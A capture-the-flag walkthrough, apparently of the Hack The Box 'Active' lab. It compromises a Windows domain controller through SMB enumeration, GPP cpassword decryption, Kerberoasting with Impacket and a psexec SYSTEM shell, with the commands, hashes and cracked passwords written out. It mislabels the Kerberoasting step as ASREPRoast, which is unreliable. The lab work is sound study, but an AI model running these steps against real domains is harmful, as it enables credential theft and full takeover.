Network Enumeration
To begin our exploration of the network, let’s initiate an nmap scan in order to identify all open ports.
──(kali㉿kali)-[~/active]
└─$ nmap -p- 10.129.170.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 11:13 EDT
Nmap scan report for 10.129.170.93
Host is up (0.013s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknownTo gather more information about the network, we can use a detailed nmap scan.
┌──(kali㉿kali)-[~/active]
└─$ nmap -sV -sC 10.129.170.93
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-18 11:07 EDT
Nmap scan report for 10.129.170.93
Host is up (0.0055s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-18 15:10:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m48s
| smb2-time:
| date: 2023-03-18T15:11:36
|_ start_date: 2023-03-18T15:07:00
| smb2-security-mode:
| 210:
|_ Message signing enabled and required
Add the domain name found from the nmap scan to /etc/hosts
10.129.205.178 active.htb SMB Enumeration
SMB null sessions are a type of network connection that allows unauthenticated access to information on a Windows-based computer. They can be used by attackers to gather sensitive information, but can be restricted or disabled to improve system security.
Use smbmap to check for null sessions.
┌──(kali㉿kali)-[~/active]
└─$ smbmap -u "" -p "" -P 445 -H 10.129.205.178
[+] IP: 10.129.205.178:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Use the recursive option in smbclient to list out all files of the replication folder.
smbclient -U '%' --no-pass -c 'recurse;ls' //10.129.205.178/ReplicationFound an interesting file.
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
Download Groups.xml and view the file.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
We found a username and cpassword. GPP/cPassword attacks are security vulnerabilities in Microsoft’s Active Directory that allow attackers to easily decrypt passwords stored in Group Policy Preferences (GPP). We can use the gpp-decrypt tool in kali to decrypt the password.
┌──(kali㉿kali)-[~/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Let’s use the newly found creds to check what shares we can see now.
┌──(kali㉿kali)-[~/active]
└─$ smbmap -H 10.129.91.65 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.91.65:445 Name: 10.129.91.65
Disk Permissions Comment
—- ———– ——-
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We can view the Users folder now. Lets gain access to it.
┌──(kali㉿kali)-[~/active]
└─$ smbclient //10.129.91.65/Users --user=active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5209799 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5209799 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sun Mar 19 06:54:48 2023
10459647 blocks of size 4096. 5209799 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)We found the first flag.
ASREPRoast
The user name of SVC_TGT gives us a clue that we can use ASREPRoast to gain excess.
We can use the GetUserSPN module in Impacket. Impacket GetUserSPN is a tool that extracts Service Principal Names (SPNs) from a list of Active Directory user accounts. It’s commonly used by administrators for authentication configuration. However, it can also be misused by attackers to identify accounts vulnerable to password spraying attacks.
┌──(kali㉿kali)-[~/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.229.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-03-19 04:35:39.483704 Let’s add the request flag.
┌──(kali㉿kali)-[~/active]
└─$ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.129.229.44 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-03-19 04:35:39.483704
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8b9545e6af4755ed25585780e8f681fd$aa52a0daa60d30947c50855bd0aeb806a5a093a32af1d2407ded4c5024d30a304e41a0c858e3b30cb395b25ecdb578fdc9e9b9a3ab5eecb8befbd7a55c98ae24fd7b6b338f5dc0bae30a593a65d3062246bf7377977b18e8d73a00d35ac32e235eaafe371ed36899dd09980d46e57104840442e91955f3e76e4fc9505db098ecda8117dbeb2d2f829726b1e60e41719a27130357b36de2326bfd219c59e403098ab89f3c187dacd88737e0957239cdd5b524a5b54249b3432c63f3a5d6cb0191b9c23f536b175c557bc3351b09047912d3201e93b27ad7914e7e8291037d26d80a1fc93111dd52d63be4405b3885846140c1b480784ecb1ead314ea9362f79a5a0c3f081ab45407e7a22154460a5cd8c3c3cc5e6e40def187d226dc01050ecde3a13ec817c63ca443b5d31efd3504a7e45b96591861ecfc87818a08c3e207a2faa4e1bde66372accd48a7aa04e4856e3a95197cf4f6b73236002fe9783cd65a88ddbab29f2741502cdfb2d1bf6196a0ccff8888570913ce1b670591a948899478cc3ff91aff47270f4568f64239c5af08ebdfbbc4b27e8ebce0334045780c3cfd1015bf968c6ac7363fe93d99d9be2db6cca82bfdcad74f4c8a76cec552e48e3eb076f2dcb7b40ea2be65a9547d946adbe33974289c4944b631fc44986ee869f324ce400bae0d69c824d1ddceefb18c3d1b63a7ac77358aa9756e5c409a03392970ba2b6cc4d76af1e0a85d4b58bffad660b7576d21fc3ab8e6ef4c6b0f0d9782266ffdab67725b632336936a5b2bb7ff4a342b3e919ee3b430d4529af98fc12bd1d6774c1165b097668191244852551d46e0e4eb51e70b896f03097c41c4071672af9028947106229d047441909b511d4d728bb00903073d993b6c34220f9b1ab9c24e1c7c8c3f9339ddb1e0bb67584be1260fce66edcc6614d4c17c06379eb4d5fa40e46cf66325451ccf5277989208934097a50ec34a579c1d117e6c1f39b75e454a335a78c4802a5444beb238f86381fa92db57d17ea34e608daa16ccb9b17dcea59e32c70e5c32f8e942ac5321f91c1b2d763568ad8141d93909231c8c54301d2074e5b56ec290acca8a1f2fa0a2f09db61c897c0ac059f5caf018465843394ca3df9115f39bd7a2ab45156cf0c679e7be620066730c4fddcf073273811d07fc8f87a015027d9865d6fe2ec9ff51aed760118b9e1bd41d19985c60954bb7089966d3b39b35231bf5b28499208ad32b8b3bb6a75b2db481dNow that we got the hash of the administrator let’s use hashcat to crack it.
With the administrator access we can view the C drive.
┌──(kali㉿kali)-[~/active]
└─$ smbmap -H 10.129.91.91 -d active.htb -u Administrator -p Ticketmaster1968
[+] IP: 10.129.91.91:445 Name: 10.129.91.91
[|] Work[!] Unable to remove test directory at \\10.129.91.91\SYSVOL\NBDXACOVFJ, please remove manually
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ, WRITE Logon server share
Replication READ ONLY
SYSVOL READ, WRITE Logon server share
Users READ ONLY
Let’s use smbclient to view the shares.
10459647 blocks of size 4096. 5186566 blocks available
smb: \Users\Administrator\> cd Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt AR 34 Mon Mar 20 05:40:15 2023
10459647 blocks of size 4096. 5186566 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
Head to the desktop of the Administrator user to get the final flag.
We can use psexec.py to gain a shell too.
┌──(kali㉿kali)-[~/active]
└─$ impacket-psexec active.htb/administrator@10.129.91.91
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.129.91.91.....
[*] Found writable share ADMIN$
[*] Uploading file JFJOcVHr.exe
[*] Opening SVCManager on 10.129.91.91.....
[*] Creating service EIwN on 10.129.91.91.....
[*] Starting service EIwN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Persecure : my learning archive 